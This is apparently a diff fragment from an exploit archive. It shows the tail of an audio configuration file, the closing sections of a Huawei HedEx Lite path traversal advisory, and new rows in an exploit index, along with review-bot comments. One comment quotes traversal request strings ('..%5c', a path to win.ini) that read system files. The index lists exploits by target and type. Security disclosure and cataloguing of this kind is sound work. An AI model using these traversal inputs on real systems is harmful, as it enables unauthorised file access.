+p1.nChannels=2
+p1.dwChannelMask=63
+p1.wBitsPerSample=16
+p1.RequiredInputBitDepth=0
+p1.bRequireInputNumberOfChannels=0
+p1.RequiredInputNumberOfChannels=6
+p1.bRequireInputSamplerate=0
+p1.RequiredInputSamplerate=48000
+p1.bRaiseMeritAndSingleInstance=1
+p2.InputEnableBitmask=-1
+p2.OutputEnableBitmask=-1
+p2.bEnableInputGains=0
+p2.bEnableOutputGains=0
+p2.bEnableMasterVolume=0
+p2.MasterVolumeGain=100
+p2.I.FL=100
+p2.I.FR=100
+p2.I.FC=100
+p2.I.LF=100
+p2.I.BL=100
+p2.I.BR=100
+p2.I.FLC=100
+p2.I.FRC=100
+p2.I.BC=100
+p2.I.SL=100
+p2.I.SR=100
+p2.I.TC=100
+p2.I.TFL=100
+p2.I.TFC=100
+p2.I.TFR=100
+p2.I.TBL=100
+p2.I.TBC=100
+p2.I.TBR=100
+p2.I.bJoinFLFR=1
+p2.I.bJoinBLBR=1
+p2.I.bJoinFLCFRC=1
+p2.I.bJoinSLSR=1
+p2.I.bJoinTFLTFR=1
+p2.I.bJoinTBLTBR=1
+p2.O.FL=100
+p2.O.FR=100
+p2.O.FC=100
+p2.O.LF=100
+p2.O.BL=100
+p2.O.BR=100
+p2.O.FLC=100
+p2.O.FRC=100
+p2.O.BC=100
+p2.O.SL=100
+p2.O.SR=100
+p2.O.TC=100
+p2.O.TFL=100
+p2.O.TFC=100
+p2.O.TFR=100
+p2.O.TBL=100
+p2.O.TBC=100
+p2.O.TBR=100
+p2.O.bJoinFLFR=1
+p2.O.bJoinBLBR=1
+p2.O.bJoinFLCFRC=1
+p2.O.bJoinSLSR=1
+p2.O.bJoinTFLTFR=1
+p2.O.bJoinTBLTBR=1
+p3.bCustomMixMatrix=0
+CustomMixMatrixFilename=
+LastRegisteredVersion=20000
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by setting restricted accessable
+paths.  A whitelist or static paths configuration can be combined.
+An update is available on the huawei website provided by the
+manufacturer of the application via customer portal.
+
+
+Security Risk:
+==============
+The security risk of the path traversal web vulnerability in the
+download manager software is estimated as high.
+
+
+Credits & Authors:
+==================
+S.AbenMassaoud [Research Team] -
+https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
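Review bot: The "Solution - Fix & Patch" section says an update is available through the customer portal but names no fixed version, so a reader cannot tell from this advisory whether an installation is patched; a line such as `Fixed in: <FIXED_VERSION>` should be added from the vendor notice. The `URL:` line in the session log reads `/................................windowswin.ini`, where the backslashes have evidently been lost; it no longer matches the `Path:` line with its `..%5c` sequences and should be restored or dropped. The log is labelled "[POST Method Request]" yet shows no request line carrying the method. "Common Vulnerability Scoring System: 7" is given without a vector string or CVSS version, which makes the score hard to compare. The wording slips `wihtout` and `Attackers can able to` should be fixed.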
diff --git a/files_exploits.csv b/files_exploits.csv
index d8fd509ac..a180a7a21 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
+49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
 49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
 49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
+49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
 49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
 49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@@ -11218,9 +11221,15 @@ id,file,description,date,author,type,platform,port
 49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
+49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
 49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
+49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
+49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
+49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17886,6 +17895,7 @@ id,file,description,date,author,type,platform,port
 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
+49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
@@ -18326,6 +18336,9 @@ id,file,description,date,author,type,platform,port
 49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
 49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
 49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
+49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
+49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
+49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38777,7 +38790,7 @@ id,file,description,date,author,type,platform,port
 39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
 39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
-39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
+39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
 39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
 39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
 39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
@@ -43199,6 +43212,7 @@ id,file,description,date,author,type,platform,port
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
 48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI'  Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
+48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@@ -43255,6 +43269,7 @@ id,file,description,date,author,type,platform,port
 48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
 48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
 48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
 48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
 48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@@ -43324,6 +43339,7 @@ id,file,description,date,author,type,platform,port
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
 49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
 49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
 49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@@ -43391,6 +43407,7 @@ id,file,description,date,author,type,platform,port
 49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
 49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
 49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
+49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
 49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
 49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@@ -43402,6 +43419,7 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@@ -43418,3 +43436,18 @@ id,file,description,date,author,type,platform,port
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
 49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
 49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
+49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
+49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
+49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,
+49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php,
+49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,
+49219,exploits/multiple/webapps/49219.txt,"VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49220,exploits/multiple/webapps/49220.txt,"VestaCP 0.9.8-26 - 'backup' Information Disclosure",2020-12-09,Vulnerability-Lab,webapps,multiple,
+49222,exploits/php/webapps/49222.txt,"Task Management System 1.0 - 'First Name and Last Name' Stored XSS",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49223,exploits/php/webapps/49223.txt,"Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49224,exploits/php/webapps/49224.txt,"Task Management System 1.0 - 'id' SQL Injection",2020-12-09,"Saeed Bala Ahmed",webapps,php,
+49227,exploits/php/webapps/49227.txt,"Barcodes generator 1.0 - 'name' Stored Cross Site Scripting",2020-12-10,"Nikhil Kumar",webapps,php,
+49228,exploits/php/webapps/49228.txt,"OpenCart 3.0.3.6 - Cross Site Request Forgery",2020-12-10,"Mahendra Purbia",webapps,php,
+49229,exploits/jsp/webapps/49229.txt,"Openfire 4.6.0 - 'path' Stored XSS",2020-12-10,j5s,webapps,jsp,
+49230,exploits/php/webapps/49230.txt,"Library Management System 2.0 - Auth Bypass SQL Injection",2020-12-10,"Manish Solanki",webapps,php,
+49231,exploits/php/webapps/49231.txt,"WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting",2020-12-10,"Ilca Lucian Florin",webapps,php,
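Review bot: The description column of the added rows names the same vulnerability class in several ways: 'Stored XSS' (49208, 49222, 49229), 'Cross Site Scripting' without the hyphen (49209, 49215, 49227, 49231) and 'Cross Site Request Forgery' (49228, and 49180 in the previous hunk), whereas neighbouring rows use 'Persistent Cross-Site Scripting' and 'Cross-Site Request Forgery'. A keyword search of this column for the hyphenated form, which is a common way to check whether a deployed product is listed, will miss these entries. Normalising the titles would fix that, e.g. `"Savsoft Quiz 5 - 'Skype ID' Persistent Cross-Site Scripting"` and `"OpenCart 3.0.3.6 - Cross-Site Request Forgery"`; row 49204 also has a doubled space in `System  Project`.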